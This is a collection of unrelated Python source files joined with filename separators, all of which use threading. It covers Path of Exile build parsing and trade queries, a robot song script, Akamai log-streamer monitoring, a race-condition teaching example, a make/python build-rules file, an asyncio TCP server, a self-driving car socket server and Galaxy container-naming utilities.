for socket in jewel_sockets:
if socket.attrib['itemId'] != "0":
item_id = socket.attrib['itemId']
parsed = parse_pob_item(tree.find(f'Items/Item[@id="{item_id}"]').text.replace('\t', ''))
stats['jewels'].append(parsed)
stats['equipped'] = equipped
try:
stats['bandit'] = tree.find('Build').attrib['bandit']
except Exception:
stats['bandit'] = "None"
try:
stats['class'] = tree.find('Build').attrib.get('className', "None")
stats['ascendancy'] = tree.find('Build').attrib.get('ascendClassName', "None")
try:
stats['total_dps'] = tree.find('Build/PlayerStat[@stat="CombinedDPS"]').attrib['value']
except Exception:
stats['total_dps'] = tree.find('Build/PlayerStat[@stat="TotalDPS"]').attrib['value']
stats['level'] = tree.find('Build').attrib['level']
try:
main_group = int(tree.find('Build').attrib.get('mainSocketGroup', 1))
skill_in_group = int(skill_slots[main_group - 1].attrib.get('mainActiveSkill', 1))
stats['main_skill'] = list(skill_slots[main_group - 1])[skill_in_group - 1].attrib['nameSpec']
except Exception:
stats['main_skill'] = " "
stats['crit_chance'] = tree.find('Build/PlayerStat[@stat="PreEffectiveCritChance"]').attrib['value']
stats['effective_crit_chance'] = tree.find('Build/PlayerStat[@stat="CritChance"]').attrib['value']
stats['chance_to_hit'] = tree.find('Build/PlayerStat[@stat="HitChance"]').attrib['value']
stats['str'] = tree.find('Build/PlayerStat[@stat="Str"]').attrib['value']
stats['dex'] = tree.find('Build/PlayerStat[@stat="Dex"]').attrib['value']
stats['int'] = tree.find('Build/PlayerStat[@stat="Int"]').attrib['value']
stats['life'] = tree.find('Build/PlayerStat[@stat="Life"]').attrib['value']
stats['life_regen'] = tree.find('Build/PlayerStat[@stat="LifeRegen"]').attrib['value']
stats['es'] = tree.find('Build/PlayerStat[@stat="EnergyShield"]').attrib['value']
stats['es_regen'] = tree.find('Build/PlayerStat[@stat="EnergyShieldRegen"]').attrib['value']
try:
stats['degen'] = tree.find('Build/PlayerStat[@stat="TotalDegen"]').attrib['value']
except AttributeError:
stats['degen'] = "0"
stats['evasion'] = tree.find('Build/PlayerStat[@stat="Evasion"]').attrib['value']
stats['block'] = tree.find('Build/PlayerStat[@stat="BlockChance"]').attrib['value']
stats['spell_block'] = tree.find('Build/PlayerStat[@stat="SpellBlockChance"]').attrib['value']
stats['dodge'] = tree.find('Build/PlayerStat[@stat="AttackDodgeChance"]').attrib['value']
stats['spell_dodge'] = tree.find('Build/PlayerStat[@stat="SpellDodgeChance"]').attrib['value']
stats['fire_res'] = tree.find('Build/PlayerStat[@stat="FireResist"]').attrib['value']
stats['cold_res'] = tree.find('Build/PlayerStat[@stat="ColdResist"]').attrib['value']
stats['light_res'] = tree.find('Build/PlayerStat[@stat="LightningResist"]').attrib['value']
stats['chaos_res'] = tree.find('Build/PlayerStat[@stat="ChaosResist"]').attrib['value']
try:
stats['power_charges'] = tree.find('Build/PlayerStat[@stat="PowerChargesMax"]').attrib['value']
except Exception:
stats['power_charges'] = '3'
try:
stats['frenzy_charges'] = tree.find('Build/PlayerStat[@stat="FrenzyChargesMax"]').attrib['value']
except Exception:
stats['frenzy_charges'] = '3'
try:
stats['endurance_charges'] = tree.find('Build/PlayerStat[@stat="EnduranceChargesMax"]').attrib['value']
except Exception:
stats['endurance_charges'] = '3'
except AttributeError:
raise OutdatedPoBException()
return stats
def parse_poe_char_api(json, cl, items_only=False):
rarity = {
0: "Normal",
1: "Magic",
2: "Rare",
3: "Unique",
4: "Gem"
}
equipped = {}
threads = []
obj_dict = {}
for item in json['items']:
# TODO: Find a more idiomatic way to do this
# As it is now, this dict should only ever contain values of type `int`
char_item = defaultdict(int)
if items_only and ('Prophecy' in item['icon'] or 'Divination' in item['icon']):
equipped['Item'] = item
continue
char_item['rarity'] = rarity[item['frameType']]
char_item['name'] = item["name"].split('>>')[-1]
if 'properties' in item:
for prop in item['properties']:
if prop['name'] == "Quality":
char_item['quality'] = int(prop['values'][0][0][1:-1])
# Weapon stats
if prop['name'] == "Physical Damage":
char_item['physical_min'] = prop['values'][0][0].split('-')[0]
char_item['physical_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Fire Damage":
char_item['fire_min'] = prop['values'][0][0].split('-')[0]
char_item['fire_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Cold Damage":
char_item['cold_min'] = prop['values'][0][0].split('-')[0]
char_item['cold_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Lightning Damage":
char_item['lightning_min'] = prop['values'][0][0].split('-')[0]
char_item['lightning_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Chaos Damage":
char_item['chaos_min'] = prop['values'][0][0].split('-')[0]
char_item['chaos_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Critical Strike Chance":
char_item['critical_chance'] = prop['values'][0][0]
if prop['name'] == "Attacks per Second":
char_item['attack_speed'] = prop['values'][0][0]
if prop['name'] == "Weapon Range":
char_item['range'] = prop['values'][0][0]
# Armour Stats
if prop['name'] == "Armour":
char_item['armour'] = prop['values'][0][0]
if prop['name'] == "Energy Shield":
char_item['energy_shield'] = prop['values'][0][0]
if prop['name'] == "Evasion":
char_item['evasion'] = prop['values'][0][0]
if char_item['name'] == '':
char_item['name'] = item["typeLine"]
if char_item['rarity'] == "Magic":
char_item['base'] = get_base_from_magic(item['typeLine'])
else:
char_item['base'] = item["typeLine"]
if items_only:
slot = "Item"
elif 'Ring' in item['inventoryId']:
slot = "Ring 2" if "2" in item['inventoryId'] else "Ring 1"
elif item['inventoryId'] == "Offhand":
slot = "Weapon 2"
elif item['inventoryId'] == "Weapon":
slot = "Weapon 1"
elif item['inventoryId'] == "Helm":
slot = "Helmet"
elif item['inventoryId'] == "BodyArmour":
slot = "Body Armour"
elif item['inventoryId'] == "Flask":
slot = f"Flask {int(item['x']) + 1}"
char_item['name'] = item["typeLine"].split('>>')[-1]
if item['frameType'] == 1 and 'Flask of' in char_item['name']:
char_item['rarity'] = "Magic"
elif item['inventoryId'] in ['Amulet', 'Helm', 'Gloves', 'Belt', 'Flask', 'Boots', 'Weapon', 'PassiveJewels']:
slot = item['inventoryId']
else:
continue
if 'implicitMods' in item:
char_item['implicits'] = item['implicitMods']
else:
char_item['implicits'] = []
if 'explicitMods' in item:
char_item['explicits'] = item['explicitMods']
else:
char_item['explicits'] = []
if 'craftedMods' in item:
for mod in item['craftedMods']:
# explicits is always a list by this point (set unconditionally above), so append is safe
char_item['explicits'].append("{crafted}" + mod)
if 'corrupted' in item:
char_item['explicits'].append('Corrupted')
if 'enchantMods' in item:
char_item['implicits'] = ["{crafted}" + item['enchantMods'][0]]
if slot == 'PassiveJewels' or items_only:
if not isinstance(equipped.get(slot), list):
equipped[slot] = [] # accumulate entries instead of resetting the list on every item
equipped[slot].append(char_item)
else:
equipped[slot] = char_item
if 'socketedItems' in item and not items_only:
equipped[slot]['gems'] = []
for socketed in item['socketedItems']:
if socketed['frameType'] == 4:
gem_d = {'name': socketed['typeLine']}
for prop in socketed['properties']:
if prop['name'] == 'Quality':
gem_d['quality'] = prop['values'][0][0].replace('+', '').replace('%', '')
if prop['name'] == 'Level':
gem_d['level'] = prop['values'][0][0]
if 'quality' not in gem_d:
gem_d['quality'] = 0
equipped[slot]['gems'].append(gem_d)
if slot != 'PassiveJewels' and 'Flask' not in slot:
t = threading.Thread(target=_get_wiki_base, args=(char_item, obj_dict, cl, slot, True))
threads.append(t)
t.start()
for thread in threads:
thread.join()
if items_only:
equipped["items_objects"] = []
for slot in obj_dict:
if not items_only:
equipped[slot]['object'] = obj_dict[slot]
else:
equipped["items_objects"] = obj_dict[slot]
stats = {'equipped': equipped}
if 'character' in json:
stats['level'] = json['character']['level']
stats['ascendancy'] = json['character']['ascendancyClass']
stats['class'] = json['character']['class']
stats['charname'] = json['character']['name']
stats['league'] = json['character']['league']
return stats
def get_base_from_magic(name: str):
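"""Recover the base type from a magic item name by dropping the leading prefix word and any "of ..." suffix."""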
return ' '.join(name.split("of")[0].split("'")[-1].split()[1:])
def poe_skill_tree(hashes, asc: str = "None", return_keystones=False, return_asc=False):
char = {
"marauder": 1,
"ranger": 2,
"witch": 3,
"duelist": 4,
"templar": 5,
"shadow": 6,
"scion": 7
}
ascendancy_bytes = {
"marauder": {
"none": 0,
"juggernaut": 1,
"berserker": 2,
"chieftain": 3
},
"ranger": {
"none": 0,
"raider": 1,
"deadeye": 2,
"pathfinder": 3
},
"witch": {
"none": 0,
"occultist": 1,
"elementalist": 2,
"necromancer": 3
},
"duelist": {
"none": 0,
"slayer": 1,
"gladiator": 2,
"champion": 3
},
"templar": {
"none": 0,
"inquisitor": 1,
"hierophant": 2,
"guardian": 3
},
"shadow": {
"none": 0,
"assassin": 1,
"trickster": 2,
"saboteur": 3
},
"scion": {
"none": 0,
"ascendant": 1
}
}
# This took me a real assload of time to figure out
# Either the 4th only or the first 4 bytes represent tree/b64 format version on poe side
# 5th and 6th byte are character class and ascendancy respectively
# Not sure if 7th byte should inherently be 0, but I think its related to start/exit nodes
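# Illustrative header for a hypothetical Witch/Elementalist tree:
# bytearray([0, 0, 0, 4]) + [3] (witch) + [2] (elementalist) + [0],
# followed by node ids such as 1234 -> b'\x04\xd2' in big-endian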
ba = bytearray([0, 0, 0, 4])
char_class = None
asc = asc.lower()
for a_char in ascendancy_bytes:
if asc in ascendancy_bytes[a_char]:
char_class = a_char
break
if not char_class:
char_class = asc
asc = "none"
ba += bytes([char[char_class]])
ba += bytes([ascendancy_bytes[char_class][asc.lower()]])
ba += bytes([0])
for hash_obj in hashes:
ba += hash_obj.to_bytes(2, 'big')
post = binascii.b2a_base64(ba).decode().strip().replace('+', '-').replace('/', '_') # b2a_base64 appends a newline; strip it so the URL stays clean
tree_keystones = []
ascendancy = []
for hash_obj in hashes:
if str(hash_obj) in keystones:
tree_keystones.append(keystones[str(hash_obj)])
if str(hash_obj) in asc_nodes:
ascendancy.append(asc_nodes[str(hash_obj)])
if return_keystones and return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones, ascendancy
elif return_keystones and not return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones
elif return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", ascendancy
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}"
def get_active_leagues():
http = urllib3.PoolManager()
resp = http.request('GET', 'https://www.pathofexile.com/api/trade/data/leagues')
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
leagues = js.loads(resp.data.decode('utf-8'))
return leagues['result']
def _trade_api_query(data, league, endpoint):
http = urllib3.PoolManager()
resp = http.request(
'POST', f'https://www.pathofexile.com/api/trade/{endpoint}/{league}',
body=js.dumps(data).encode('utf-8'), headers={'Content-Type': 'application/json'}
)
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
json_result = js.loads(resp.data.decode('utf-8'))
listing_ids = json_result['result']
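# the fetch endpoint caps the number of ids per request, so only the first
# 10 search results are retrieved here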
entries = http.request('GET', f'https://www.pathofexile.com/api/trade/fetch/{",".join(listing_ids[:10])}')
if entries.status != 200:
raise RequestException(entries.data.decode('utf-8'))
return js.loads(entries.data.decode('utf-8'))['result']
def currency_rates(have: str, want: str, league: str):
data = {
"exchange": {
"status": {
"option": "online"
},
"have": [have],
"want": [want]
}
}
listings = _trade_api_query(data, league, 'exchange')
return CurrencyQuery(have, want, league, listings)
def item_price(item, league):
data = {
"query": {
"term": item,
"status": {
"option": "online"
}
},
"sort": {
"price": "asc"
},
}
listings = _trade_api_query(data, league, 'search')
return ItemPriceQuery(item, league, listings)
|
national-song.py | from expression import *
from threading import Thread
def song():
changeDegree([3,5,9], [70,60,90])
changeDegree([7], [30])
os.system('aplay /home/pi/Robot-Blueberry/audio-files/national-song.wav')
takePosition()
def move():
time.sleep(1)
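# placeholder: a real routine would drive motion in parallel with the song thread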
if __name__ == '__main__':
t1 = Thread(target=song)
t2 = Thread(target=move)
t1.start()
t2.start()
|
UlsMonitoring.py | # Copyright 2022 Akamai Technologies, Inc. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import threading
import json
import datetime
import sys
import modules.aka_log as aka_log
import config.global_config as uls_config
class UlsMonitoring:
def __init__(self, stopEvent, product, feed, output):
"""
Handle ULS self-monitoring; emits performance counters on stdout.
Args:
stopEvent (threading.Event): Event from the controlling thread to tell the monitoring to stop
product (string): Akamai Product name/acronym
feed (string): specific data feed being consumed by ULS
output (string): output target the collected events are written to
"""
self._stopEvent = stopEvent
self._product = product
self._feed = feed
self._output = output
# Prevent other thread interact with the performance counters
self._metricLock = threading.Lock()
# Variables
self.monitoring_enabled = uls_config.monitoring_enabled # Monitoring enable Flag
self.monitoring_interval = uls_config.monitoring_interval # Monitoring interval
self._version = uls_config.__version__
# Definitions
self.name = "UlsMonitoring" # Class Human readable name
self.overall_messages_handled = 0 # Define overall number of messages handled
self.window_messages_handled = 0 # Define mon_window number of messages handled
self.init_time = time.time() # Define the init time
# Define the working thread, daemon allows us to offload
# of the main program termination to python
self.mon_thread = threading.Thread(target=self.display, daemon=True)
def start(self):
if self.monitoring_enabled:
aka_log.log.debug(f"{self.name} monitoring thread started...")
# Start the background thread
self.mon_thread.start()
else:
aka_log.log.debug(f"{self.name} monitoring was disabled - not starting.")
def display(self):
"""
Entry point for the monitoring thread
"""
try: # Exception handling is crucial once on the thread
while not self._stopEvent.is_set():
aka_log.log.debug(f"{self.name} sleeping {self.monitoring_interval} sec...")
# wait() returns False when the interval elapses without the stop event
# being set, i.e. ULS is still running and we can safely report activity
if not self._stopEvent.wait(self.monitoring_interval):
mon_msg = {
'dt': datetime.datetime.utcnow().isoformat(),
'uls_product': self._product,
'uls_feed': self._feed,
'uls_output': self._output,
'uls_version': self._version,
'uls_runtime': self._runtime(),
'event_count': self.overall_messages_handled,
'event_count_interval': self.window_messages_handled,
'event_rate': round(self.window_messages_handled / self.monitoring_interval, 2),
'mon_interval': self.monitoring_interval
}
#print(json.dumps(mon_msg))
sys.stdout.write(json.dumps(mon_msg) + "\n")
sys.stdout.flush()
# Reset window based vars
with self._metricLock:
self.window_messages_handled = 0
except Exception as e:
aka_log.log.exception(e)
def increase_message_count(self):
with self._metricLock:
self.overall_messages_handled = self.overall_messages_handled + 1
self.window_messages_handled = self.window_messages_handled + 1
def get_message_count(self):
return self.overall_messages_handled
def get_stats(self):
with self._metricLock:
return f"event_count={self.overall_messages_handled}, runtime={self._runtime()}"
def _runtime(self):
return int(time.time() - self.init_time)
# EOF
|
4. non_locked_threads.py | from threading import Thread
import time
import random
counter = 0
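# deliberately unsynchronized: concurrent `counter += 1` updates can interleave,
# which is exactly the race condition this example demonstrates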
def increment_counter():
global counter
time.sleep(random.randint(0, 2))
counter += 1
time.sleep(random.randint(0, 2))
print(f'New counter value: {counter}')
time.sleep(random.randint(0, 2))
print('-----------')
for x in range(10):
t = Thread(target=increment_counter)
time.sleep(random.randint(0, 2))
t.start()
|
cxx_sources_deps_rules.py | # this is a make/python hybrid file
# Normal make files are a make/sh hybrid.
# This makefile uses python instead of sh (or bash)
test_cxx_sources ?=
checkcxxsources $(cxxsources):$(out_init)
$(origin)
if (this == "checkcxxsources") and (not os.path.exists(env.cxxsources)):
leave()
caption()
if (this == env.cxxsources):
lib_cxx, main_cxx = [],[]
quote = "'"
else:
quote = ""
test_cxx=[]
for root, dirs, files in os.walk(env.cxxsrc) :
for file in files:
if file.endswith(".cxx"):
cxx = quote+os.path.join(root, file)+quote
if root.endswith("/main"):
if (this == env.cxxsources): lib_cxx.append(cxx); main_cxx.append(cxx)
test_cxx.append(cxx)
elif root.endswith("/test"):
test_cxx.append(cxx)
test_cxx.sort()
if (this == env.cxxsources):
lib_cxx.sort()
main_cxx.sort()
with open (this, "w") as f:
f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this))
f.write("lib_cxx_sources := %s\n\n" % (",".join(lib_cxx)))
f.write("main_cxx_sources := %s\n\n" % (",".join(main_cxx)))
f.write("test_cxx_sources := %s\n\n" % (",".join(test_cxx)))
leave()
before = set([$(test_cxx_sources)])
after = set(test_cxx)
removed = str(before-after).replace(root_prefix,"")
added = str(after-before).replace(root_prefix,"")
removals = removed != "set()"
additions = added != "set()"
if removals or additions:
print ("cxx source files were added or removed\n")
if removals: print("removals:", removed)
if additions: print("additions:", added)
print ("\nForcing dependency and rule regeneration and re-link.\n")
run(env.MAKE, "re-dep")
cxx_dep0 := $(CXX), "-E", "--trace-includes", $(DEP_CXX_FLAGS)
cxx_dep1 := "-I$(cxxinc)", cxx, "-o/dev/null"
cxx_dep := $(cxx_dep0), $(cxx_dep1)
$(cxxdeps): $(cxxsources);$(caption)
def find_dep(cxx, q, fd_a):
deps = []
lines = str(fd_a.gorge($(cxx_dep))).split(r"\n")
for line in lines:
i = line.find("$(cxxinc)")
if i != -1: deps.append(line[i:])
q.put(cxx[fd_a.root:].replace("/","_").replace(".cxx","_obj_deps"))
q.put([cxx] + sorted(deps))
queues, process = [],[]
fd_a=types.SimpleNamespace()
fd_a.gorge = gorge
fd_a.root = root_prefix_len
prefix = "test_cxx_sources := "
prefix_len = len(prefix)
with open(first) as f:
lines = f.readlines()
for line in lines:
if line.startswith(prefix):
sources = line[prefix_len:].rstrip()
test_cxx = sources.split(",")
for _cxx in test_cxx:
cxx = _cxx.replace("'","")
q = multiprocessing.Queue()
p = multiprocessing.Process(target=find_dep, args=(cxx, q, fd_a))
process.append(p)
queues.append(q)
p.start()
break
with open (this, "w") as f:
f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this))
n = 1
for q in queues:
obj = q.get()
deps = q.get()
f.write("\n# %d\n%s := " % (n, obj))
f.write(" ".join(deps))
f.write("\n")
n+=1
for p in process: p.join()
$(objrules): $(cxxdeps); $(caption)
suffix = "_obj_deps"
prefix = "cxxsrc_"
main_prefix = prefix + "main_"
test_prefix = prefix + "test_"
sep = " := "
sep_len = len(sep)
prefix_len = len(prefix)
main_obj0, test_obj0, lib_obj0 = [],[],[]
main_objs, test_objs, lib_objs = {},{},{}
cxx_ext = ".cxx"
cxx_ext_len = len(cxx_ext)
with open(first) as f:
lines = f.readlines()
for line in lines:
if line.startswith(prefix):
i = line.find(sep)
if i == -1: raise RuntimeError("Source deps line not formatted correctly")
deps = line[:i]
sources = line[i+sep_len:]
j = sources.find(cxx_ext)
if j == -1: raise RuntimeError("Source deps line not formatted correctly")
j += cxx_ext_len
cxxfile = sources[root_prefix_len:j]
cxxfile_i = "need to work on ctfe wrapper..."
deps1 = deps.replace(suffix,".o")
deps1 = deps1.replace("cxxsrc","$$(obj)")
deps1 = deps1.replace("_","/",2)
obj = deps1
if deps.startswith(main_prefix):
lib_obj = obj.replace("$$(obj)/main","$$(obj)/lib")
test_obj = obj.replace("$$(obj)/main/","$$(obj)/test/main__")
main_objs[obj] = (cxxfile,deps,cxxfile_i)
lib_objs[lib_obj] = (cxxfile,deps,cxxfile_i)
test_objs[test_obj] = (cxxfile,deps,cxxfile_i)
main_obj0.append(obj)
lib_obj0.append(lib_obj)
test_obj0.append(test_obj)
continue
if deps.startswith(test_prefix):
test_objs[obj] = (cxxfile,deps,cxxfile_i)
test_obj0.append(obj)
def target(label, objs, rule, cxx, dest, f):
f.write("\n\n# %s\n" % label)
for obj, pre in objs.items():
f.write("%s: $$(%s) %s\n $$(caption0);" % (obj, pre[1], dest))
f.write("""run(%s, '-D__CXX_SRCFILE__="%s"', %s)\n""" % (cxx, pre[0], rule))
f.write(" ## %s\n\n" % (pre[2]))
def make_quoted_list(obj): return ",".join(map(lambda x: "'"+x+"'", obj))
with open (this, "w") as f:
f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this))
f.write("\nmain_exe_objects := %s\n" % (" ".join(main_obj0)))
f.write("\nlib_so_objects := %s\n" % (" ".join(lib_obj0)))
f.write("\ntest_exe_objects := %s\n" % (" ".join(test_obj0)))
f.write("\n__main_exe_objects__ := %s\n" % (make_quoted_list(main_obj0)))
f.write("\n__lib_so_objects__ := %s\n" % (make_quoted_list(lib_obj0)))
f.write("\n__test_exe_objects__ := %s\n" % (make_quoted_list(test_obj0)))
ipch = "'-include-pch',"
rule = "$$(__CXX_FLAGS), '-c', '$$<', '-o$$@'"
main = ipch + "'$$(main_sysheaders_pch)'," + rule + ", $$(MAIN_EXTRA)"
test = ipch + "'$$(test_sysheaders_pch)'," + rule + ", $$(TEST_EXTRA)"
lib = ipch + "'$$(lib_sysheaders_pch)'," + rule + ", $$(LIB_EXTRA)"
cxx = "$$(CXX)"
main_d = "$$(obj_main_init) $$(main_sysheaders_pch)"
lib_d = "$$(obj_lib_init) $$(lib_sysheaders_pch)"
test_d = "$$(obj_test_init) $$(test_sysheaders_pch)"
target("main", main_objs, main, cxx, main_d, f)
target("lib", lib_objs, lib, cxx, lib_d, f)
target("test", test_objs, test, cxx, test_d, f)
|
tcp_server.py | # Copyright (c) 2017, 2018 Jae-jun Kang
# See the file LICENSE for details.
import asyncio
from threading import Thread
from x2py.util.trace import Trace
from x2py.links.server_link import ServerLink
from x2py.links.asyncio.tcp_session import TcpSession
class TcpServer(ServerLink):
def __init__(self, name):
super(TcpServer, self).__init__(name)
self.loop = asyncio.new_event_loop()
self.server = None
self.thread = Thread(target=self.loop.run_forever)
def cleanup(self):
self.loop.call_soon_threadsafe(self.loop.stop)
self.thread.join()
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
#self.loop.close()
super(TcpServer, self).cleanup()
def listen(self, host, port):
factory = self.loop.create_server(self, host, port)
self.server = self.loop.run_until_complete(factory)
Trace.info("listening on {}:{}", host, port)
self.thread.start()
def _on_connect(self, result, context):
super(TcpServer, self)._on_connect(result, context)
if result:
peername = context.transport.get_extra_info('peername')
Trace.info("accepted from {}:{}", peername[0], peername[1])
def _on_disconnect(self, handle, context):
super(TcpServer, self)._on_disconnect(handle, context)
peername = context.transport.get_extra_info('peername')
Trace.info("disconnected from {}:{}", peername[0], peername[1])
# protocol factory
def __call__(self):
return TcpSession(self)
|
self_driver.py | import SocketServer
import threading
import numpy as np
import cv2
import sys
import serial
from keras.models import load_model
from self_driver_helper import SelfDriver
ultrasonic_data = None
# BaseRequestHandler is used to process incoming requests
class UltrasonicHandler(SocketServer.BaseRequestHandler):
data = " "
def handle(self):
global ultrasonic_data # publish readings to the module-level variable shared with the video handler
while self.data:
self.data = self.request.recv(1024)
ultrasonic_data = float(self.data.split('.')[0])
print(ultrasonic_data)
# VideoStreamHandler uses streams which are file-like objects for communication
class VideoStreamHandler(SocketServer.StreamRequestHandler):
# Include port and baudrate, with timeout of 1 second
ser = serial.Serial("/dev/ttyUSB0", 115200, timeout=1)
model = load_model("saved_model/nn_model.h5")#####################################################
def handle(self):
global ultrasonic_data # read/reset the shared obstacle distance
stream_bytes = b''
driver = SelfDriver(self.ser)
try:
# stream video frames one by one
while True:
stream_bytes += self.rfile.read(1024)
first = stream_bytes.find(b'\xff\xd8')
last = stream_bytes.find(b'\xff\xd9')
if first != -1 and last != -1:
jpg = stream_bytes[first:last + 2]
stream_bytes = stream_bytes[last + 2:]
gray = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
#image = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)
# lower half of the image
height, width = gray.shape
roi = gray[int(height/2):height, :]
cv2.imshow('image', roi)
image_array = roi.flatten().astype(np.float32)
prediction = self.model.predict_classes(image_array)
print("Prediction is", prediction)
# get prediction and then steer
if ultrasonic_data is not None and int(ultrasonic_data) < 40:
print("Stopping car because of obstacle.")
driver.stop() # `driver` is the local SelfDriver instance created above
ultrasonic_data = None
driver.steer(prediction)
finally:
cv2.destroyAllWindows()
sys.exit()
class SelfDriverServer(object):
def __init__(self, host, portUS, portCam):
self.host = host
self.portUS = portUS
self.portCam = portCam
def startUltrasonicServer(self):
# Create the Ultrasonic server, binding to localhost on port 50001
server = SocketServer.TCPServer((self.host, self.portUS), UltrasonicHandler)
server.serve_forever()
def startVideoServer(self):
# Create the video server, binding to localhost on port 50002
server = SocketServer.TCPServer((self.host, self.portCam), VideoStreamHandler)
server.serve_forever()
def start(self):
ultrasonic_thread = threading.Thread(target=self.startUltrasonicServer)
ultrasonic_thread.daemon = True
ultrasonic_thread.start()
self.startVideoServer()
if __name__ == "__main__":
# From SocketServer documentation
HOST, PORTUS, PORTCAM = '192.168.0.15', 50001, 50002
sdc = SelfDriverServer(HOST, PORTUS, PORTCAM)
sdc.start()
|
util.py | """Utilities for working with mulled abstractions outside the mulled package."""
from __future__ import print_function
import collections
import hashlib
import logging
import sys
import threading
import time
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
requests.post("https://quay.io/api/v1/repository", json=data, headers=headers)
def quay_versions(namespace, pkg_name):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'] if tag != 'latest']
def quay_repository(namespace, pkg_name):
assert namespace is not None
assert pkg_name is not None
url = 'https://quay.io/api/v1/repository/%s/%s' % (namespace, pkg_name)
response = requests.get(url, timeout=None)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
Check whether the given repository name exists among the namespace's public quay.io repositories (cached when possible)
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=None)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
# Following check is pretty expensive against biocontainers... don't even bother doing it
# if can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.debug("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
def split_tag(tag):
"""Split mulled image name into conda version and conda build."""
version = tag.split('--', 1)[0]
build = tag.split('--', 1)[1]
return version, build
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
return sorted(elements, key=packaging.version.parse, reverse=True)
Target = collections.namedtuple("Target", ["package_name", "version", "build"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
return Target(package_name, version, build)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
if image_build is not None:
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
suffix = image_build
else:
suffix += ":%s" % target.version
build = target.build
if build is not None:
suffix += "--%s" % build
return "%s%s" % (target.package_name, suffix)
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
